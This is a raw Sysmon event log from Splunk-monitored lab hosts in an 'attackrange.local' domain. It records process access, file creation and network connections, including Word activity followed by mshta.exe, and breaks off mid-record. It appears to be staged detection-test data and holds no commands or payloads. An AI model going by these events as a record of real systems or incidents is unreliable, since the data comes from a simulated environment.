Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A6025D7F843728F589A556B4551D11F,SHA256=15035FCDFA015D8BD062EECA44CC65A2B13718A2C47786925559BC45CA90975E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441430Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:16.242{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441429Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:16.242{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292939Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.976{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68145D9C89259D14E8430CFFD9E48F8D,SHA256=5EC159EA47054EF78F84D9975C2F65F8E8DCB442BC19F8AE443B7030206E4279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292938Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.791{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571EC3AC462DE9EEB7CC4BBFEEDD9DB6,SHA256=D3CF0339D8CF1804E1FCACD39EF7CAD0F87778C8FEB426EF3A5647221D337132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441437Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:17.974{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6C12752BFA27D731972DAC9DF50FD74,SHA256=4DEFC549A7C363BAA8DFD890721F27747A3AFCA0CF0D1CF2A3F93E42EA42CB47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441436Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:17.566{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A8966A2FF73B4E32C9866C2EE1A18CF,SHA256=E8C5A7AA1BE160BF9641A9DBB889A8B6E6F84A2A6AC18811C385C6145032336F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292937Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.058{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000292936Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.058{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000292935Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.058{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x8000000000000000292934Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.058{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 23542300x8000000000000000292933Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.058{BEA10069-02A1-6088-112A-00000000BB01}6568WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF4ab292e.TMPMD5=A6666C88F531D6A3EEE3D9678C3CE865,SHA256=3D28857F4D3F1A08984A56A609BD6F9753D2CA82ABABA01371B290267B204C1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292932Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.021{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000292931Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.021{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000292930Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.021{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x8000000000000000292929Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.021{BEA10069-02A1-6088-112A-00000000BB01}65684520C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 23542300x8000000000000000292928Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:17.021{BEA10069-02A1-6088-112A-00000000BB01}6568WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF4ab28ff.TMPMD5=5FB81AE19CC55DACA0BAFF68B4E746C1,SHA256=690A3FCD329A1BD1CDFD8981FC15EA4560BA845F34DBE20C9297942499E85460,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441435Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:17.243{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441434Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:17.243{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441443Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:15.410{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal62649- 354300x8000000000000000441442Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:15.410{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal63364- 354300x8000000000000000441441Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:14.686{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62425-false10.0.1.12-8000- 23542300x8000000000000000441440Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:18.593{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42AC38EED784608B33777F7C4C32BD3,SHA256=98C43D6F6F2A1F142DFA3363CB76B0B73D839454533BDC07CC187EE10475AD4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292942Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:18.824{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBA8275EA6086469529D6962DE88553B,SHA256=C3344A346210E085F224BF8AC0B498B2A7CBB95E1BA07124B9FC815A3E26C0ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292941Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:16.272{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50651-false138.91.136.108-443https 354300x8000000000000000292940Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:16.261{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50652-false173.222.229.180a173-222-229-180.deploy.static.akamaitechnologies.com443https 10341000x8000000000000000441439Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:18.244{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441438Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:18.244{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292944Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:19.826{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C06C79A4AF2D8A8E2C105574CFA4A8,SHA256=899A945D9BCF2CD441F5A3D919552B8EB53CDAD4AE027578CA61C6BD011F9ED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441446Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:19.605{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9A864A7F926CB8942B201884F3AB761,SHA256=106723AD2B5E7B9A2153298E99B1FA6BE9C5013CE3D1A5C7AB506198547E6F0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441445Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:19.245{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441444Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:19.245{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292943Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:19.541{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EC68B4FFF350E91C3DE5E025369878D,SHA256=2E779A996FCD8DDB48A1E7E05FA128889BFFF9ABBC0D03C1419971EE274831AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292975Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.864{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292974Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.864{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292973Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 